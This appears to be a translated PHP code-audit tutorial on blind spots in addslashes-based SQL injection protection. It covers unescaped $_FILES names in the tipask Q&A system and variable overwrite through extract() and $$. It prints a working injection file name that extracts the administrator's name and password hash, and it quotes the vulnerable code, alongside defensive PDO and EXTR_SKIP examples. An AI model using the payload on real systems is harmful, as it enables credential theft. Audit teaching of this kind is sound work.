[PHP code audit] Exploring SQL injection together (8): summary of global protection blind spots, part 2 - PHP tutorial

Source: Internet
Author: User
0x01 Background

Currently, web applications usually defend against SQL injection by checking whether magic_quotes_gpc is enabled and, if it is not, running addslashes() over the request to escape special characters such as single quotes. Relying on this kind of protection alone leaves a number of blind spots. Following on from http://www.waitalone.cn/php-code-audit-6.html, this part introduces two more cases.

Blind spots:

① $_FILES injection: only parameters such as GET and POST are escaped globally, while $_FILES is left out;

② Variable overwrite: the dangerous functions are extract(), parse_str() and $$ (variable variables).

0x02 Vulnerability analysis

$_FILES injection

$_FILES injection generally arises when the name of the uploaded file is written into the database with an INSERT during the upload process. For the details, see the tipask Q&A system.

First, let's take a look at how global protection works:

In index.php:

    include TIPASK_ROOT . '/model/tipask.class.php';
    $tipask = new tipask();
    $tipask->run();
    // ...

Following into /model/tipask.class.php:

    function init_request() {
        // ...
        $this->get  = taddslashes($this->get, 1);
        $this->post = taddslashes(array_merge($_GET, $_POST));
        checkattack($this->post, 'post');
        checkattack($this->get, 'get');
        unset($_POST);
    }

We can see that the data arriving through GET and POST is escaped with addslashes, while nothing at all is done to $_FILES. Searching the code base for $_FILES turns up the upload handling in /control/attach.php. Following up:

    // The opening of this snippet ($config = array("uploadPath" => ...) is cut off in the
    // source; the array is reconstructed from the keys used further down.
    $config = array(
        "uploadPath" => "data/attach/",   // save path
        "fileType"   => array(".rar", ".doc", ".docx", ".zip", ".pdf", ".txt", ".swf", ".wmv", "xsl"), // allowed file formats
        "fileSize"   => 10                // file size limit, in MB
    );
    // file upload status: "SUCCESS" on success, otherwise the corresponding error string
    $state = "SUCCESS";
    $clientFile = $_FILES["upfile"];
    if (!isset($clientFile)) {
        echo "{'state':'The file size exceeds the server configuration!','url':'null','fileType':'null'}"; // adjust upload_max_filesize and post_max_size in php.ini
        exit;
    }
    // format verification
    $current_type = strtolower(strrchr($clientFile["name"], '.'));
    if (!in_array($current_type, $config['fileType'])) {
        $state = "unsupported file type!";
    }
    // size verification
    $file_size = 1024 * 1024 * $config['fileSize'];
    if ($clientFile["size"] > $file_size) {
        $state = "the file size exceeds the limit!";
    }
    // save the file
    if ($state == "SUCCESS") {
        $targetfile = $config['uploadPath'] . gmdate('ymm', $this->time) . '/' . random(8) . strrchr($clientFile["name"], '.');
        $result = $_ENV['attach']->movetmpfile($clientFile, $targetfile);
        if (!$result) {
            $state = "an error occurred while saving the file!";
        } else {
            // here the uploaded file name is handed to the database layer as-is
            $_ENV['attach']->add($clientFile["name"], $current_type, $clientFile["size"], $targetfile, 0);
        }
    }
    // return the JSON data to the browser
    echo '{"state":"' . $state . '","url":"' . $targetfile . '","fileType":"' . $current_type . '","original":"' . $clientFile["name"] . '"}';

You can see the call $_ENV['attach']->add($clientFile["name"], ...). The value $clientFile["name"], which is simply $_FILES["upfile"]["name"], is passed unescaped to the add() method below, which inserts it into the database, and that is where the injection happens.

    // The function header is cut off in the source; the parameter list is reconstructed
    // from the five-argument call in attach.php above.
    function add($filename, $ftype, $fsize, $location, $isimage = 0) {
        $uid = $this->base->user['uid'];
        // $filename is interpolated straight into the SQL string
        $this->db->query("INSERT INTO " . DB_TABLEPRE . "attach(time,filename,filetype,filesize,location,isimage,uid)
            VALUES ({$this->base->time},'$filename','$ftype','$fsize','$location',$isimage,$uid)");
        return $this->db->insert_id();
    }

Upload a file whose name has been changed to the following, and the administrator's account name and password hash are written into the database:

    filename = "1','.php',1,(select concat(username,0x23,password) from ask_user limit 1),2,1).jpg"

The administrator's account name and password hash are successfully inserted into the attach table of the database.
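As an added example, not code from tipask or from this article, the following script reproduces the sink with an in-memory SQLite database through PDO, so it can be run offline from the CLI. The escape_request() helper stands in for the global escaping in tipask.class.php (it only ever sees GET and POST), the upload array is constructed, and the attach table mirrors the one above. It shows the concatenated INSERT failing on a file name that merely contains a quote, and a parameterized INSERT storing the same name literally, with an allowlist filter on the stored name as defence in depth.

```php
<?php
// Added example: why escaping GET and POST alone leaves $_FILES['upfile']['name']
// untouched, and how a parameterized INSERT closes the gap. Not tipask code.

// Stand-in for the global escape: it covers only the arrays it is given.
function escape_request(array $get, array $post): array {
    return array_map('addslashes', array_merge($get, $post));
}

// Defence in depth for a name that must be kept for display: strip any path
// component and reduce it to a conservative character set.
function sanitize_original_name(string $name): string {
    $name = basename($name);
    return substr(preg_replace('/[^A-Za-z0-9._-]/', '_', $name), 0, 255);
}

// Vulnerable form: the raw name is concatenated into SQL, as in attach.class.php.
function add_unsafe(PDO $pdo, string $filename): bool {
    try {
        $pdo->exec("INSERT INTO attach(time,filename,filetype,filesize,location,isimage,uid)
                    VALUES (0,'$filename','.pdf','1234','data/attach/x.pdf',0,1)");
        return true;
    } catch (PDOException $e) {
        // A single quote in the name already breaks the statement; a crafted name
        // would instead change what the statement does.
        return false;
    }
}

// Hardened form: bound parameters, so the name is data whatever it contains.
function add_safe(PDO $pdo, string $filename, string $ftype, int $fsize,
                  string $location, int $isimage, int $uid): int {
    $stmt = $pdo->prepare('INSERT INTO attach(time,filename,filetype,filesize,location,isimage,uid)
                           VALUES (:time,:filename,:filetype,:filesize,:location,:isimage,:uid)');
    $stmt->execute(array(
        ':time' => time(), ':filename' => $filename, ':filetype' => $ftype,
        ':filesize' => $fsize, ':location' => $location, ':isimage' => $isimage, ':uid' => $uid,
    ));
    return (int) $pdo->lastInsertId();
}

// Constructed upload, shaped the way PHP populates $_FILES.
$files = array('upfile' => array('name' => "report'.pdf", 'size' => 1234, 'tmp_name' => '/tmp/phpABC123'));

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE attach (id INTEGER PRIMARY KEY, time INTEGER, filename TEXT, filetype TEXT,
            filesize INTEGER, location TEXT, isimage INTEGER, uid INTEGER)');

$post     = escape_request($_GET, $_POST);   // global escaping covers these ...
$filename = $files['upfile']['name'];        // ... but this value never went through it

var_dump(add_unsafe($pdo, $filename));       // the quote in the name breaks the query

$id  = add_safe($pdo, sanitize_original_name($filename), '.pdf', 1234, 'data/attach/x.pdf', 0, 1);
$row = $pdo->query('SELECT filename FROM attach WHERE id = ' . (int) $id)->fetch(PDO::FETCH_ASSOC);
var_dump($row['filename']);                  // stored as data, not interpreted as SQL
```

The point of the two functions side by side is that the fix does not belong in the escaping layer at all: extending taddslashes() to $_FILES would patch this one sink, while binding parameters at the query makes every caller safe regardless of which superglobal the value came from.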

Variable overwrite

extract() is used in a great many places. For example, extract($_POST) pulls the variables straight out of the POST array and overwrites any variables that were defined before it.


Posting a=1 directly from the browser, the value of variable a is found to be successfully overwritten.

A current example is the WooYun case http://www.wooyun.org/bugs/wooyun-2014-053189, where the table prefix is overwritten.

$$ variable overwrite

The principle is the same as above. A classic piece of $$ variable overwrite code:

    <?php
    $a = 1;   // value the application expects to keep
    // The outer loop is cut off in the source; it is reconstructed from the standard
    // form of this snippet, which walks each request array in turn.
    foreach (array('_COOKIE', '_POST', '_GET') as $_request) {
        foreach ($$_request as $_key => $_value) {
            $$_key = addslashes($_value);   // registers every request key as a global variable
        }
    }
    echo $a;

The test found that the variable a was successfully overwritten.

Case: http://www.wooyun.org/bugs/wooyun-2010-055338
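The following added example, which is not code from the WooYun reports or from this article, covers both cases above: the extract() overwrite and the $$ loop, each beside a form that keeps the application's own variables out of the client's reach. The $post array is constructed to stand in for $_POST so the script runs from the CLI; the variable names $tablepre and $a are chosen to match the cases discussed.

```php
<?php
// Added example: variable overwrite through extract() and $$, with hardened forms.

// Constructed request: the client names a table prefix and a variable the code already uses.
$post = array('tablepre' => 'evil_', 'a' => 'injected', 'title' => 'hello');

// --- extract() ---------------------------------------------------------------

function extract_unsafe(array $post): string {
    $tablepre = 'ask_';          // application-controlled value
    extract($post);              // default is EXTR_OVERWRITE: the request wins
    return $tablepre;
}

function extract_safe(array $post): string {
    $tablepre = 'ask_';
    extract($post, EXTR_SKIP);   // keys that already exist as variables are skipped
    return $tablepre;
}

// Safer still: request values land in a prefixed namespace, and only the expected
// parameters are read out of it.
function extract_prefixed(array $post): array {
    extract($post, EXTR_PREFIX_ALL, 'req');   // creates $req_title, $req_a, ...; never $tablepre
    return isset($req_title) ? array('title' => $req_title) : array();
}

// --- $$ loop -----------------------------------------------------------------

function dollar_dollar_unsafe(array $post): string {
    $a = 'original';
    foreach ($post as $_key => $_value) {
        $$_key = addslashes($_value);   // writes $a, $tablepre, ... whatever the client names
    }
    return $a;
}

function dollar_dollar_safe(array $post): array {
    $a = 'original';
    $request = array();
    foreach ($post as $_key => $_value) {
        $request[$_key] = addslashes($_value);   // escaped copy kept in one array; $a untouched
    }
    return array('a' => $a, 'request' => $request);
}

var_dump(extract_unsafe($post));          // prefix now comes from the request
var_dump(extract_safe($post));            // prefix kept
var_dump(extract_prefixed($post));        // only the expected parameter, under its own name

var_dump(dollar_dollar_unsafe($post));    // $a replaced by the client's value
var_dump(dollar_dollar_safe($post));      // $a intact, request data in $request
```

When auditing, search for extract( calls that pass a superglobal without EXTR_SKIP or a prefix flag, and for $$ written from a loop over request data; both patterns hand the client a write to any variable name it chooses, including configuration such as the table prefix.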
